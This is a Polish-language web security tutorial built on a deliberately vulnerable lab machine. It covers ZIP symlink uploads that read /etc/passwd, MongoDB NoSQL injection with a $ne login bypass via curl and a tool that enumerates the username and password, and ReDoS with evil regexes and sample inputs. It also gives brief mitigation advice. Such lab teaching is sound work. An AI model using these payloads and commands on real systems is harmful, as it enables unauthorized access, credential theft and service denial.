### Atak dowiązaniami symbolicznymi ZIP
Archiwum może zawierać dowiązanie symboliczne. Dowiązanie symboliczne to specjalny plik, który zawiera link do innego pliku. Przesyłając plik zip zawierający dowiązanie symboliczne i po jego rozpakowaniu, można uzyskać dostęp do dowiązania symbolicznego, aby uzyskać dostęp do plików, do których nie powinieneś mieć dostępu. Aby to zrobić, trzeba sprawić, aby dowiązanie symboliczne odwoływało się do plików poza katalogiem głównym, na przykład `/etc/passwd`.

Napotyka się na tego typu problemy, gdy programista zezwala na akceptowanie plików zip w funkcji przesyłania, a następnie rozpakowuje te pliki po otrzymaniu ich na serwerze. Stwarza to potencjalną lukę.

Zasadniczo, gdy użytkownik przesyła plik zip do takiej aplikacji, aplikacja naprawdę wydaje się być podatna na ataki, jeśli po prostu pobierze plik zip i rozpakuje jego pliki bez żadnej walidacji. Może wtedy dojść do exploitu.

Kod jest dostępny na __VulnVM__ w punkcie końcowym `/zip.php`
i lokalnie w `/var/www/html/zip.php`
Po przesłaniu specjalnie przygotowanego pliku .zip, możemy wyświetlić plik .zip i rozpakowane pliki w punkcie końcowym `/uploads`

```sh
# Po pierwsze potrzebny jest plik link z nową nazwą (tak samo jak skrót)
sudo ln -s /etc/passwd shortcut_to_passwd
# Kiedy zakotwiczymy plik
cat shortcut_to_passwd
# Widzimy /etc/passwd, ponieważ shortcut_to_passwd point to /etc/passwd
# Następnie tworzymy archiwum zip z dowiązaniami symbolicznymi
sudo zip --symlinks test.zip shortcut_to_passwd
```

Na koniec trzeba przesłać ten plik do __VulnVM__ w punkcie końcowym `/zip.php`.
Kiedy kod backendu rozpakowuje archiwum, można wyświetlić zawartość połączonego pliku shortcut_to_passwd file to the VulnVM local /etc/passwd i można odczytać jego zawartość


### Wstrzyknięcie NoSQL
Bazy danych NoSQL zapewniają luźniejsze ograniczenia spójności niż tradycyjne bazy danych SQL. Wymagając mniejszej liczby ograniczeń relacyjnych i kontroli spójności, bazy danych NoSQL często oznaczają korzyści w zakresie wydajności i skalowania. W związku z tym wiele aplikacji internetowych korzysta z nich, aby przyspieszyć wydajność i zapewnić większą elastyczność podczas rozwoju aplikacji. 

Najpopularniejsze systemy baz danych NoSQL (wg [ranking silników db](https://db-engines.com/en/ranking)) to:
- MongoDB https://db-engines.com/en/system/MongoDB
- Redis https://db-engines.com/en/system/Redis
- Elasticsearch https://db-engines.com/en/system/Elasticsearch
- Cassandra https://db-engines.com/en/system/Cassandra
- Splunk https://db-engines.com/en/system/Splunk
- Neo4j https://db-engines.com/en/system/Neo4j

Te systemy zarządzania bazami danych zostały zainstalowane miliony razy i z czasem zyskały większą stabilność. Jednak te DBMS są nadal potencjalnie podatne na ataki oparte na wstrzykiwaniu, nawet jeśli nie używają tradycyjnej składni SQL. Ponieważ te ataki iniekcyjne NoSQL mogą być wykonywane w języku proceduralnym, a nie w deklaratywnym języku SQL, ich potencjalny wpływ jest większy niż w przypadku tradycyjnych iniekcji SQL.

Wywołania bazy danych NoSQL są zapisywane w języku programowania aplikacji (takim jak PHP, Python, Java, node.js, Ruby itp.) i przekształcane przez odpowiednią bibliotekę w niestandardowe wywołanie API lub formatowane zgodnie ze wspólną konwencją (taką jak XML, JSON, LINQ itp.). 

Złośliwe dane wejściowe wymierzone w te specyfikacje wywołań dbms mogą nie wywoływać kontroli czystości aplikacji. Na przykład odfiltrowanie popularnych znaków specjalnych HTML, takich jak < > & ; nie zapobiegnie atakom na interfejs JSON API, w którym znaki specjalne obejmują `/` `{` `}` `:`.

Istnieje wiele luk związanych z bazami danych DBMS NoSQL. Skupimy się teraz na przykładzie związanym z MongoDB (najpopularniejszym systemem baz danych NoSQL).

##### Fragment kodu podatnego na ataki
Poniżej znajduje się pozornie dobrze wyglądający fragment kodu PHP, który pobiera parametry nazwy użytkownika i hasła z formularza HTTP POST, przekształca je na zmienne PHP. 
Następnie nawiązywane jest połączenie z klientem MongoDB. Instancja MongoDB jest dostępna na hoście lokalnym przez port 27017. Na koniec wysyłane jest żądanie do bazy danych, które przeszukuje tabelę użytkowników według nazwy użytkownika i hasła.

Kod jest dostępny na __VulnVM__ w punkcie końcowym `/homepage.php`
i lokalnie w `/var/www/html/homepage.php`

```php
$username = $_POST['username'];
$password = $_POST['password'];
$connection = new MongoDB\Client('mongodb://localhost:27017');
if($connection) {
	$db = $connection->test;
	$users = $db->users;
	$query = array(
		"user" => $username,
		"password" => $password
	);
	$req = $users->findOne($query);
}
```

Mimo że powyższy kod wydaje się być poprawnie skomponowanym PHP, aplikacja z pewnością nie jest bezpieczna z wielu powodów. Skupimy się jednak tylko na możliwości wstrzykiwania NoSQL za pomocą operatorów takich jak: `[$ne]`, `[$lt]`, `[$gt]`, `[$regex]`
Operator zapytania [$ne] oznacza nie równy. Dlatego jeśli uda nam się wstrzyknąć go do zmiennej `$username` lub `$password`, wynikowe zapytanie znajdzie pierwszy rekord, w którym
- __nazwa_użytkownika__ to powiedzmy __admin__
- a __hasło__ to powiedzmy __not foo__

Jeśli powyższy kod zostanie użyty do uwierzytelnienia, atakujący zostanie zalogowany jako administrator, skutecznie wykorzystując powyższy pomysł. 

W podobny sposób można użyć większej liczby operatorów, na przykład [$lt] i [$gt] oraz [$regex]. Wyrażenia regularne mogą nawet pozwolić atakującemu na wyliczenie wszystkich użytkowników w powyższym scenariuszu, próbując kombinacji w kolejności i oceniając wynik.

##### Atak iniekcyjny MongoDB NoSQL
Skupmy się teraz na wykorzystaniu podatnego kodu przedstawionego powyżej
poprzez interakcję z formularzem rejestracyjnym `/homepage.php`. Możemy trochę pobawić się tym formularzem.

Najpierw zidentyfikowaliśmy cel ataku (formularz rejestracji). 
Następnie możemy spróbować przeprowadzić atak iniekcyjny SQL.
```sh
# Jest to dość proste, ponieważ potrzebujemy tylko ładunku takiego jak:
admin' or '1'='1 
# widzimy, że wstrzyknięcie SQL tutaj nie działa 
```

Teraz spróbujmy czegoś innego, na przykład wstrzyknięcia MongoDB:
Wykonamy teraz zapytanie POST do strony: http://vuln.vms.perkmylife.com/homepage.php
przesyłając poniższy Request body:
```sh
password[$ne]=test&username[$ne]=test

# Wyślijmy teraz odpowiednio spreparowane zapytanie:
curl -L -c "/tmp/cookie" "http://vuln.vms.perkmylife.com/homepage.php" -X POST -d 'password[$ne]=test&username[$ne]=test' -vvv
```
Ups i mamy dostęp do panelu administracyjnego

Teraz, ponieważ wykorzystaliśmy kod backendu, który na to pozwolił z powodu braku oczyszczania danych wejściowych, powinniśmy spróbować wyodrębnić więcej danych z bazy. 
Możemy to osiągnąć za pomocą narzędzia github do iniekcji NoSQL
https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
```sh
python3 nosqli-user-pass-enum.py -u http://vuln.vms.perkmylife.com/homepage.php -up username -pp password -ep username
python3 nosqli-user-pass-enum.py -u URL -up username -pp password -ep username
# gdzie -up i -pp to nazwa parametru z formularza HTML, a -ep to parametr do wyliczenia
```
Otrzymujemy nazwę użytkownika `admin`. Teraz możemy analogicznie spróbować wyliczyć hasło
```sh
python3 nosqli-user-pass-enum.py -u http://vuln.vms.perkmylife.com/homepage.php -up username -pp password -ep password
```
Wstrzyknięcie NoSQL powiodło się, mamy hasło `admin:StrongPassword`

Dobrym zaleceniem dla właściciela lub programisty tej aplikacji byłoby dodanie warstwy bezpieczeństwa do procesu uwierzytelniania użytkownika. Obejmuje to co najmniej:
- sanityzacja wejścia, 
- haszowanie i solenie haseł
- token CSRF na formularzu


### Wyrażenie regularne Odmowa usługi — ReDoS
Wyrażenie regularne Denial of Service (ReDoS) to atak typu Denial of Service, który wykorzystuje fakt, że większość implementacji wyrażeń regularnych może osiągać ekstremalne sytuacje, które sprawiają, że zaczynają działać bardzo powoli (wykładniczo zależnie od rozmiaru danych wejściowych). Atakujący może następnie spowodować, że program używający wyrażenia regularnego (Regex) wejdzie w te ekstremalne sytuacje, a następnie zawiesi się na bardzo długi czas. To najprawdopodobniej spowodowałoby odmowę usługi.

Części aplikacji internetowych, które są najbardziej narażone na tego typu ataki, są zwykle powiązane z takim lub innym sposobem wyszukiwania lub porównywania tekstów, za pomocą funkcji takich jak: 
- `preg_match` dla __PHP__ 
- lub `REGEXP` dla MySQL 
- r `java.util.regex.Matcher`/`java.util.regex.Pattern`
- oraz inne klasy lub funkcje obsługujące REGEX dostępne w innych technologiach

##### Problematyczny algorytm naiwny Regex
Algorytm Regex naiwny buduje niedeterministyczny automat skończony (NFA), który jest maszyną skończonych stanów, w której dla każdej pary stanu i symbolu wejściowego może być kilka możliwych następnych stanów. Następnie silnik zaczyna wykonywać przejście do końca wejścia. Ponieważ może być kilka możliwych następnych stanów, stosowany jest algorytm deterministyczny. Algorytm ten próbuje pojedynczo wszystkie możliwe ścieżki (w razie potrzeby), aż zostanie znalezione dopasowanie (lub wszystkie ścieżki zostaną wypróbowane i nie powiodą się).
To w większości przypadków przeciąża wiele potężnych procesorów lub powoduje zapełnienie dostępnej pamięci RAM.


Podatne polecenia Regex dostępne w repozytoriach online:
[ReGexLib,id=1757 (email validation)](http://regexlib.com/REDetails.aspx?regexp_id=1757) - zobaczcie treść tłustym drukiem, którą stanowi Evil Regex
```sh
^([a-zA-Z0-9])(([\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$
# Input:
aaaaaaaaaaaaaaaaaaaaaaaa!
```

[OWASP Validation Regex Repository](https://wiki.owasp.org/index.php/OWASP_Validation_Regex_Repository), Java Classname - zobaczcie treść tłustym drukiem, którą stanowi Evil Regex
```sh
^(([a-z])+.)+[A-Z]([a-z])+$
# Input:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
```